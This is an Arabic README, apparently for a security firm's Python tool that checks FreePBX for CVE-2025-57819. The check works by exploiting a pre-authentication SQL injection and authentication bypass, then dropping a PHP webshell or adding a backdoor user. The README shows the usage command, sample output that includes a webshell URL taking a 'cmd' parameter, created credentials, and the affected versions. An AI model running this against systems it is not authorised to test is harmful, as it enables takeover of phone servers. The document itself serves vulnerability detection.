
مولد أثر كشف مبني على بايثون لـ CVE-2025-57819، يستغل ثغرة RCE قبل المصادقة في FreePBX عبر حقن SQL وتجاوز المصادقة لنشر صدفات ويب أو إنشاء مستخدمين خلفيين.
أداة توليد أثر الكشف عن ثغرة تنفيذ الأوامر عن بعد قبل المصادقة من نوع 1day في FreePBX
يحاول مولد أثر الكشف رفع سكريبت PHP أو إضافة مستخدم جديد إذا فشلت عملية الرفع.
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FreePBX-CVE-2025-57819.py
(*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
- Piotr and Sonny of watchTowr
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
[+] Cleaning.sh malicious cron_job - please confirm manually that there is no malicious entries in asterisk.cron_jobs table
إذا فشل رفع سكريبت PHP، فسيتراجع إلى الكشف القائم على المستخدم. حيث يضيف اسم مستخدم "عشوائي" بكلمة مرور "عشوائية" مكونة من 12 حرفًا.
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FreePBX-CVE-2025-57819.py
(*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE
- Piotr and Sonny of watchTowr
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[-] Webshell not found - falling back to user adding
[+] Adding user: watchTowrm0njzhj0ii / CdEf2DWGpT8u
[+] Verifying if user exists
[+] VULNERABLE: user added
يحاول هذا السكريبت اكتشاف ما إذا كان FreePBX معرضًا لثغرة CVE-2025-57819 (تنفيذ الأوامر عن بعد قبل المصادقة).
< 15.0.66
< 16.0.89
< 17.0.3
لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr